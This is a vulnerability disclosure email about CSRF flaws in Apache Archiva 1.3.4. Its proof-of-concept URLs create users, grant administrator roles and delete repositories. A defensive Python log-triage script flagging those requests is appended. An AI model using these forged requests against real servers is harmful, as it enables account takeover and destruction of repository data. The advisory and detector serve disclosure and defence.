Hi,

This is regarding multiple CSRF (Cross-Site Request Forgery)
vulnerabilities in Apache Archiva 1.3.4 (and previous versions). The
following is the disclosure document.

Product Description:
Apache Archiva is an extensible repository management software that
helps take care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT.

Proof of Concept:
http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abc
http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test
http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit
http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots
http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp
http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm
http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal
http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots
http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar
http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy
http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=%2F*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=%2F*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsumers=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums
http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project
http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed

Warm Regards,
Riyaz Ahemed Walikar || Senior Engineer - Professional Services
Vulnerability Assessment & Penetration Testing
Mobile: +91-98860-42242 || Extn: 5601
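
A log-triage check for the endpoints listed above, added here as an example (not part of the original advisory and not Archiva code): it flags requests to those state-changing actions whose Referer is missing or points outside the Archiva host. The combined access-log format, the host name `archiva.example.internal:8080` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# State-changing action names taken from the proof-of-concept URLs in the advisory.
SENSITIVE_ACTIONS = {
    "usercreate!submit", "userdelete!submit", "addRolesToUser",
    "deleteRepository", "deleteArtifact!doDelete", "addRepositoryGroup",
    "deleteRepositoryGroup", "disableProxyConnector!disable",
    "deleteProxyConnector!delete", "deleteLegacyArtifactPath",
    "saveNetworkProxy", "deleteNetworkProxy!delete",
    "repositoryScanning!addFiletypePattern",
    "repositoryScanning!removeFiletypePattern",
    "repositoryScanning!updateKnownConsumers",
    "database!updateUnprocessedConsumers", "database!updateCleanupConsumers",
}

# Combined log format: ... "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious_requests(lines, trusted_hosts):
    """Return (action, referer) for sensitive actions not referred from a trusted host."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a parseable access-log line
        path = urlsplit(m["target"]).path
        action = path.rsplit("/", 1)[-1].removesuffix(".action")
        if action not in SENSITIVE_ACTIONS:
            continue
        ref_host = urlsplit(m["referer"]).netloc  # "" when the Referer is "-" or empty
        if ref_host not in trusted_hosts:
            hits.append((action, m["referer"]))
    return hits

# Constructed sample lines (assumed host names and paths, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Jan/2011:10:00:00 +0000] "GET /archiva/security/userdelete!submit.action?username=test HTTP/1.1" 200 512 "http://archiva.example.internal:8080/archiva/index.action" "Mozilla/5.0"',
    '10.0.0.5 - admin [01/Jan/2011:10:05:00 +0000] "GET /archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents HTTP/1.1" 200 734 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '10.0.0.5 - admin [01/Jan/2011:10:06:00 +0000] "GET /archiva/security/addRolesToUser.action?principal=test HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2011:10:07:00 +0000] "GET /archiva/browse HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for action, referer in suspicious_requests(SAMPLE_LOG, {"archiva.example.internal:8080"}):
        print(f"review: {action} referred from {referer!r}")
```

A missing Referer can also come from browser privacy settings, so treat these hits as items to review against the administrator's actual activity rather than as confirmed forgeries.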